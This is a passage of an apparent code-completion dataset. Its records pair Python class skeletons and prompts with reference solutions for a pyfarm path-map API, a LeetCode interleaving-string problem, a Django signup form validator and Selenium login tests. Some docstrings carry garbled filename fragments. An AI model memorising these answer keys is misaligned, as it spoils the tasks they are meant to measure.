be transparently created. .. http:post:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http POST /api/v1/pathmaps/ HTTP/1.1 Accept: application/json { \"path_linux\": \"/mnt/nfs\", \"path_windows\": \"\\\\domain\\\\cifs_server\", \"path_osx\": \"/mnt/nfs\", \"tag\": \"production\" } **Response** .. sourcecode:: http HTTP/1.1 201 CREATED Content-Type: a\"\"\"\n tagname = g.json.pop('tag', None)\n if tagname:\n if not isinstance(tagname, STRING_TYPES):\n return (jsonify(error='tag must be of type string'), BAD_REQUEST)\n pathmap = PathMap(**g.json)\n if tagname:\n tag = Tag.query.filter_by(tag=tagname).first()\n if not tag:\n tag = Tag(tag=tagname)\n db.session.add(tag)\n pathmap.tag = tag\n db.session.add(pathmap)\n db.session.commit()\n out = pathmap.to_dict(unpack_relationships=False)\n if pathmap.tag:\n out['tag'] = pathmap.tag.tag\n logger.info('New pathmap created with values: %r', pathmap)\n return (jsonify(out), CREATED)\n\n def get(self):\n \"\"\"A ``GET`` to this endpoint will return a list of all registered path maps, with id. It can be made with a for_agent query parameter, in which case it will return only those path maps that apply to that agent. .. http:get:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http GET /api/v1/pathmaps/ HTTP/1.1 Accept: application/json **Response** .. sourcecode:: http HTTP/1.1 200 OK Content-Type: application/json [ { \"id\": 1, \"path_osx\": \"/mnt/nfs\", \"path_windows\": \"\\\\\\\\domains\\\\cifs_server\", \"path_linux\": \"/mnt/nfs\" }, { \"id\": 7, \"path_osx\": \"/renderout\", \"path_windows\": \"c:\\\\renderout\", \"path_linux\": \"/renderout\" \"tag\": \"usual\", } ] :statuscode 200: no error\"\"\"\n query = PathMap.query\n for_agent = get_uuid_argument('for_agent')\n if for_agent:\n query = query.filter(or_(PathMap.tag == None, PathMap.tag.has(Tag.agents.any(Agent.id == for_agent))))\n logger.debug('Query: %s', str(query))\n output = []\n for map in query:\n map_dict = map.to_dict(unpack_relationships=False)\n if map.tag:\n map_dict['tag'] = map.tag.tag\n del map_dict['tag_id']\n output.append(map_dict)\n return (jsonify(output), OK)\n", "source": "the_stack_v2_python_sparse", "source_path": "pyfarm/master/api/pathmaps.py", "source_repo": "pyfarm/pyfarm-master", "split": "test", "star_events_count": 2} {"blob_id": "c60575f7850c29aca253a93182fae2a80721fc5d", "bodies": ["m, n, s = (len(s1), len(s2), len(s3))\nif s != m + n:\n return False\ndp = [[False] * (n + 1) for _ in range(m + 1)]\ndp[0][0] = True\nfor i in range(1, n + 1):\n if s2[i - 1] == s3[i - 1]:\n dp[0][i] = dp[0][i - 1]\nfor i in range(1, m + 1):\n if s1[i - 1] == s3[i - 1]:\n dp[i][0] = dp[i - 1][0]\nfor i in range(1, m + 1):\n for j in range(1, n + 1):\n if s1[i - 1] == s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j] or dp[i][j - 1]\n elif s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i][j - 1]\n elif s1[i - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j]\n else:\n dp[i][j] = False\nreturn dp[-1][-1]", "m, n, s = (len(s1), len(s2), len(s3))\nif s != m + n:\n return False\ndp = [[False] * (n + 1) for _ in range(m + 1)]\ndp[0][0] = True\nfor i in range(1, n + 1):\n if s2[i - 1] == s3[i - 1]:\n dp[0][i] = dp[0][i - 1]\nfor i in range(1, m + 1):\n if s1[i - 1] == s3[i - 1]:\n dp[i][0] = dp[i - 1][0]\nfor i in range(1, m + 1):\n for j in range(1, n + 1):\n if s1[i - 1] == s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j] or dp[i][j - 1]\n elif s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i][j - 1]\n elif s1[i - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j]\n else:\n dp[i][j] = False\nreturn dp[-1][-1]"], "bodies_text": "<|body_start_0|>\n m, n, s = (len(s1), len(s2), len(s3))\n if s != m + n:\n return False\n dp = [[False] * (n + 1) for _ in range(m + 1)]\n dp[0][0] = True\n for i in range(1, n + 1):\n if s2[i - 1] == s3[i - 1]:\n dp[0][i] = dp[0][i - 1]\n for i in range(1, m + 1):\n if s1[i - 1] == s3[i - 1]:\n dp[i][0] = dp[i - 1][0]\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if s1[i - 1] == s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j] or dp[i][j - 1]\n elif s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i][j - 1]\n elif s1[i - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j]\n else:\n dp[i][j] = False\n return dp[-1][-1]\n<|end_body_0|>\n\n<|body_start_1|>\n m, n, s = (len(s1), len(s2), len(s3))\n if s != m + n:\n return False\n dp = [[False] * (n + 1) for _ in range(m + 1)]\n dp[0][0] = True\n for i in range(1, n + 1):\n if s2[i - 1] == s3[i - 1]:\n dp[0][i] = dp[0][i - 1]\n for i in range(1, m + 1):\n if s1[i - 1] == s3[i - 1]:\n dp[i][0] = dp[i - 1][0]\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if s1[i - 1] == s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j] or dp[i][j - 1]\n elif s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i][j - 1]\n elif s1[i - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j]\n else:\n dp[i][j] = False\n return dp[-1][-1]\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def isInterleave(self, s1: str, s2: str, s3: str) -> bool:\n \"\"\"dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]\"\"\"\n <|body_0|>\n\n def isInterleave(self, s1: str, s2: str, s3: str) -> bool:\n \"\"\"dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n m, n, s = (len(s1), len(s2), len(s3))\n if s != m + n:\n return False\n dp = [[False] * (n + 1) for _ in range(m + 1)]\n dp[0][0] = True\n for i in range(1, n + 1):\n if s2[i - 1] == s3[i - 1]:\n dp[0][i] = dp[0][i - 1]\n for i in range(1, m + 1):\n if s1[i - 1] == s3[i - 1]:\n dp[i][0] = dp[i - 1][0]\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if s1[i - 1] == s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j] or dp[i][j - 1]\n elif s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i][j - 1]\n elif s1[i - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j]\n else:\n dp[i][j] = False\n return dp[-1][-1]\n<|end_body_0|>\n\n<|body_start_1|>\n m, n, s = (len(s1), len(s2), len(s3))\n if s != m + n:\n return False\n dp = [[False] * (n + 1) for _ in range(m + 1)]\n dp[0][0] = True\n for i in range(1, n + 1):\n if s2[i - 1] == s3[i - 1]:\n dp[0][i] = dp[0][i - 1]\n for i in range(1, m + 1):\n if s1[i - 1] == s3[i - 1]:\n dp[i][0] = dp[i - 1][0]\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if s1[i - 1] == s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j] or dp[i][j - 1]\n elif s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i][j - 1]\n elif s1[i - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j]\n else:\n dp[i][j] = False\n return dp[-1][-1]\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000273", "length_bytes": 3374, "license_type": "no_license", "methods": [{"docstring": "dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]", "name": "isInterleave", "signature": "def isInterleave(self, s1: str, s2: str, s3: str) -> bool"}, {"docstring": "dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]", "name": "isInterleave", "signature": "def isInterleave(self, s1: str, s2: str, s3: str) -> bool"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003533", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def isInterleave(self, s1: str, s2: str, s3: str) -> bool: dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]\n- def isInterleave(self, s1: str, s2: str, s3: str) -> bool: dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def isInterleave(self, s1: str, s2: str, s3: str) -> bool: dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]\n- def isInterleave(self, s1: str, s2: str, s3: str) -> bool: dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]\n\n<|skeleton|>\nclass Solution:\n\n def isInterleave(self, s1: str, s2: str, s3: str) -> bool:\n \"\"\"dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]\"\"\"\n <|body_0|>\n\n def isInterleave(self, s1: str, s2: str, s3: str) -> bool:\n \"\"\"dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n m, n, s = (len(s1), len(s2), len(s3))\n if s != m + n:\n return False\n dp = [[False] * (n + 1) for _ in range(m + 1)]\n dp[0][0] = True\n for i in range(1, n + 1):\n if s2[i - 1] == s3[i - 1]:\n dp[0][i] = dp[0][i - 1]\n for i in range(1, m + 1):\n if s1[i - 1] == s3[i - 1]:\n dp[i][0] = dp[i - 1][0]\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if s1[i - 1] == s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j] or dp[i][j - 1]\n elif s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i][j - 1]\n elif s1[i - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j]\n else:\n dp[i][j] = False\n return dp[-1][-1]\n<|end_body_0|>\n\n<|body_start_1|>\n m, n, s = (len(s1), len(s2), len(s3))\n if s != m + n:\n return False\n dp = [[False] * (n + 1) for _ in range(m + 1)]\n dp[0][0] = True\n for i in range(1, n + 1):\n if s2[i - 1] == s3[i - 1]:\n dp[0][i] = dp[0][i - 1]\n for i in range(1, m + 1):\n if s1[i - 1] == s3[i - 1]:\n dp[i][0] = dp[i - 1][0]\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if s1[i - 1] == s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j] or dp[i][j - 1]\n elif s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i][j - 1]\n elif s1[i - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j]\n else:\n dp[i][j] = False\n return dp[-1][-1]\n<|end_body_1|>\n", "revision_id": "57f303aa6e76f7c5292fa60bffdfddcb4ff9ddfb", "skeleton": "<|skeleton|>\nclass Solution:\n\n def isInterleave(self, s1: str, s2: str, s3: str) -> bool:\n \"\"\"dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]\"\"\"\n <|body_0|>\n\n def isInterleave(self, s1: str, s2: str, s3: str) -> bool:\n \"\"\"dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def isInterleave(self, s1: str, s2: str, s3: str) -> bool:\n \"\"\"dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]\"\"\"\n m, n, s = (len(s1), len(s2), len(s3))\n if s != m + n:\n return False\n dp = [[False] * (n + 1) for _ in range(m + 1)]\n dp[0][0] = True\n for i in range(1, n + 1):\n if s2[i - 1] == s3[i - 1]:\n dp[0][i] = dp[0][i - 1]\n for i in range(1, m + 1):\n if s1[i - 1] == s3[i - 1]:\n dp[i][0] = dp[i - 1][0]\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if s1[i - 1] == s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j] or dp[i][j - 1]\n elif s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i][j - 1]\n elif s1[i - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j]\n else:\n dp[i][j] = False\n return dp[-1][-1]\n\n def isInterleave(self, s1: str, s2: str, s3: str) -> bool:\n \"\"\"dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]\"\"\"\n m, n, s = (len(s1), len(s2), len(s3))\n if s != m + n:\n return False\n dp = [[False] * (n + 1) for _ in range(m + 1)]\n dp[0][0] = True\n for i in range(1, n + 1):\n if s2[i - 1] == s3[i - 1]:\n dp[0][i] = dp[0][i - 1]\n for i in range(1, m + 1):\n if s1[i - 1] == s3[i - 1]:\n dp[i][0] = dp[i - 1][0]\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if s1[i - 1] == s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j] or dp[i][j - 1]\n elif s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i][j - 1]\n elif s1[i - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j]\n else:\n dp[i][j] = False\n return dp[-1][-1]\n", "source": "the_stack_v2_python_sparse", "source_path": "4_LEETCODE/2_DP/字符串匹配问题/97_交错字符串.py", "source_repo": "fzingithub/SwordRefers2Offer", "split": "test", "star_events_count": 1} {"blob_id": "a7c17eea41f1bca733144fb1fdbda5d7e988de33", "bodies": ["full_name = self.cleaned_data.get('full_name')\nforbidden_users = ['admin', 'user', 'login', 'authenticate', 'css', 'js', 'logout', 'adminstrator', 'root', 'email', 'join', 'sql', 'static', 'python', 'delete']\nif full_name.lower() in forbidden_users:\n raise forms.ValidationError('This is a reserved word.', code='reserved word')\nif '@' in full_name or '-' in full_name or '+' in full_name or ('=' in full_name):\n raise forms.ValidationError('This is an Invalid Name, Do not use these chars: @ , - , + , =', code='invalid')\nreturn full_name", "email1 = self.cleaned_data.get('email')\nemail2 = self.cleaned_data.get('email2')\nif email1 != email2:\n raise forms.ValidationError('The two email fields didn’t match.', code=\"emails don't match\")\nif User.objects.filter(email__iexact=email2).exists():\n raise forms.ValidationError('An account with this Email already exists.', code='email exists')\nreturn email2"], "bodies_text": "<|body_start_0|>\n full_name = self.cleaned_data.get('full_name')\n forbidden_users = ['admin', 'user', 'login', 'authenticate', 'css', 'js', 'logout', 'adminstrator', 'root', 'email', 'join', 'sql', 'static', 'python', 'delete']\n if full_name.lower() in forbidden_users:\n raise forms.ValidationError('This is a reserved word.', code='reserved word')\n if '@' in full_name or '-' in full_name or '+' in full_name or ('=' in full_name):\n raise forms.ValidationError('This is an Invalid Name, Do not use these chars: @ , - , + , =', code='invalid')\n return full_name\n<|end_body_0|>\n\n<|body_start_1|>\n email1 = self.cleaned_data.get('email')\n email2 = self.cleaned_data.get('email2')\n if email1 != email2:\n raise forms.ValidationError('The two email fields didn’t match.', code=\"emails don't match\")\n if User.objects.filter(email__iexact=email2).exists():\n raise forms.ValidationError('An account with this Email already exists.', code='email exists')\n return email2\n<|end_body_1|>\n", "class_docstring": "User creation form class.", "class_name": "UserRegisterForm", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass UserRegisterForm:\n \"\"\"User creation form class.\"\"\"\n\n def clean_full_name(self):\n \"\"\"Validate fullname.\"\"\"\n <|body_0|>\n\n def clean_email2(self):\n \"\"\"Validate email 2.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n full_name = self.cleaned_data.get('full_name')\n forbidden_users = ['admin', 'user', 'login', 'authenticate', 'css', 'js', 'logout', 'adminstrator', 'root', 'email', 'join', 'sql', 'static', 'python', 'delete']\n if full_name.lower() in forbidden_users:\n raise forms.ValidationError('This is a reserved word.', code='reserved word')\n if '@' in full_name or '-' in full_name or '+' in full_name or ('=' in full_name):\n raise forms.ValidationError('This is an Invalid Name, Do not use these chars: @ , - , + , =', code='invalid')\n return full_name\n<|end_body_0|>\n\n<|body_start_1|>\n email1 = self.cleaned_data.get('email')\n email2 = self.cleaned_data.get('email2')\n if email1 != email2:\n raise forms.ValidationError('The two email fields didn’t match.', code=\"emails don't match\")\n if User.objects.filter(email__iexact=email2).exists():\n raise forms.ValidationError('An account with this Email already exists.', code='email exists')\n return email2\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000274", "length_bytes": 6446, "license_type": "no_license", "methods": [{"docstring": "Validate fullname.", "name": "clean_full_name", "signature": "def clean_full_name(self)"}, {"docstring": "Validate email 2.", "name": "clean_email2", "signature": "def clean_email2(self)"}], "n_methods": 2, "prompt": "Implement the Python class `UserRegisterForm` described below.\n\nClass description:\nUser creation form class.\n\nMethod signatures and docstrings:\n- def clean_full_name(self): Validate fullname.\n- def clean_email2(self): Validate email 2.", "prompted_full_text": "Implement the Python class `UserRegisterForm` described below.\n\nClass description:\nUser creation form class.\n\nMethod signatures and docstrings:\n- def clean_full_name(self): Validate fullname.\n- def clean_email2(self): Validate email 2.\n\n<|skeleton|>\nclass UserRegisterForm:\n \"\"\"User creation form class.\"\"\"\n\n def clean_full_name(self):\n \"\"\"Validate fullname.\"\"\"\n <|body_0|>\n\n def clean_email2(self):\n \"\"\"Validate email 2.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n full_name = self.cleaned_data.get('full_name')\n forbidden_users = ['admin', 'user', 'login', 'authenticate', 'css', 'js', 'logout', 'adminstrator', 'root', 'email', 'join', 'sql', 'static', 'python', 'delete']\n if full_name.lower() in forbidden_users:\n raise forms.ValidationError('This is a reserved word.', code='reserved word')\n if '@' in full_name or '-' in full_name or '+' in full_name or ('=' in full_name):\n raise forms.ValidationError('This is an Invalid Name, Do not use these chars: @ , - , + , =', code='invalid')\n return full_name\n<|end_body_0|>\n\n<|body_start_1|>\n email1 = self.cleaned_data.get('email')\n email2 = self.cleaned_data.get('email2')\n if email1 != email2:\n raise forms.ValidationError('The two email fields didn’t match.', code=\"emails don't match\")\n if User.objects.filter(email__iexact=email2).exists():\n raise forms.ValidationError('An account with this Email already exists.', code='email exists')\n return email2\n<|end_body_1|>\n", "revision_id": "167ffd3a4183529c0cbc5db4ab232026711ea915", "skeleton": "<|skeleton|>\nclass UserRegisterForm:\n \"\"\"User creation form class.\"\"\"\n\n def clean_full_name(self):\n \"\"\"Validate fullname.\"\"\"\n <|body_0|>\n\n def clean_email2(self):\n \"\"\"Validate email 2.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class UserRegisterForm:\n \"\"\"User creation form class.\"\"\"\n\n def clean_full_name(self):\n \"\"\"Validate fullname.\"\"\"\n full_name = self.cleaned_data.get('full_name')\n forbidden_users = ['admin', 'user', 'login', 'authenticate', 'css', 'js', 'logout', 'adminstrator', 'root', 'email', 'join', 'sql', 'static', 'python', 'delete']\n if full_name.lower() in forbidden_users:\n raise forms.ValidationError('This is a reserved word.', code='reserved word')\n if '@' in full_name or '-' in full_name or '+' in full_name or ('=' in full_name):\n raise forms.ValidationError('This is an Invalid Name, Do not use these chars: @ , - , + , =', code='invalid')\n return full_name\n\n def clean_email2(self):\n \"\"\"Validate email 2.\"\"\"\n email1 = self.cleaned_data.get('email')\n email2 = self.cleaned_data.get('email2')\n if email1 != email2:\n raise forms.ValidationError('The two email fields didn’t match.', code=\"emails don't match\")\n if User.objects.filter(email__iexact=email2).exists():\n raise forms.ValidationError('An account with this Email already exists.', code='email exists')\n return email2\n", "source": "the_stack_v2_python_sparse", "source_path": "accounts/forms.py", "source_repo": "OmarFateh/Student-Portal", "split": "test", "star_events_count": 0} {"blob_id": "5cc5eac319f75440514be1f352dcc2ca7af962de", "bodies": ["if self.staging_tests:\n test_email = 'superlists_tests@163.com'\nelse:\n test_email = 'abc@163.com'\nself.browser.get(self.live_server_url)\ninput_email = self.browser.find_element_by_name('email')\ninput_email.send_keys(test_email)\ninput_email.send_keys(Keys.ENTER)\nself.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\nemail_body = self.wait_for_email(test_email)\nurl = self.get_token_url(email_body)\nself.assertIn(self.live_server_url, url)\nself.browser.get(url)\nself.wait_to_be_logged_in(email=test_email)\nself.browser.find_element_by_link_text('退出').click()\nself.wait_to_be_logged_out(email=test_email)", "discorrect_url = '{}/accounts/login?token=abc123'.format(self.live_server_url)\nself.browser.get(discorrect_url)\nself.wait_for(lambda: self.assertIn('登录失败', self.browser.find_element_by_id('id_messages').text))\nself.browser.find_element_by_name('email')", "if self.staging_tests:\n test_email = 'superlists_tests@163.com'\nelse:\n test_email = 'abc@163.com'\nself.browser.get(self.live_server_url)\ninput_email = self.browser.find_element_by_name('email')\ninput_email.send_keys(test_email)\ninput_email.send_keys(Keys.ENTER)\nself.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\nemail_body = self.wait_for_email(test_email)\nurl_1 = self.get_token_url(email_body)\nself.browser.quit()\ntime.sleep(5)\nself.init_browser()\nself.browser.get(self.live_server_url)\ninput_email = self.browser.find_element_by_name('email')\ninput_email.send_keys(test_email)\ninput_email.send_keys(Keys.ENTER)\nself.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\nemail_body = self.wait_for_email(test_email)\nurl_2 = self.get_token_url(email_body)\nself.assertNotEqual(url_1, url_2)\nself.browser.get(url_1)\nself.wait_for(lambda: self.assertIn('登录失败', self.browser.find_element_by_id('id_messages').text))\nself.browser.find_element_by_name('email')\nself.browser.get(url_2)\nself.wait_to_be_logged_in(email=test_email)"], "bodies_text": "<|body_start_0|>\n if self.staging_tests:\n test_email = 'superlists_tests@163.com'\n else:\n test_email = 'abc@163.com'\n self.browser.get(self.live_server_url)\n input_email = self.browser.find_element_by_name('email')\n input_email.send_keys(test_email)\n input_email.send_keys(Keys.ENTER)\n self.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\n email_body = self.wait_for_email(test_email)\n url = self.get_token_url(email_body)\n self.assertIn(self.live_server_url, url)\n self.browser.get(url)\n self.wait_to_be_logged_in(email=test_email)\n 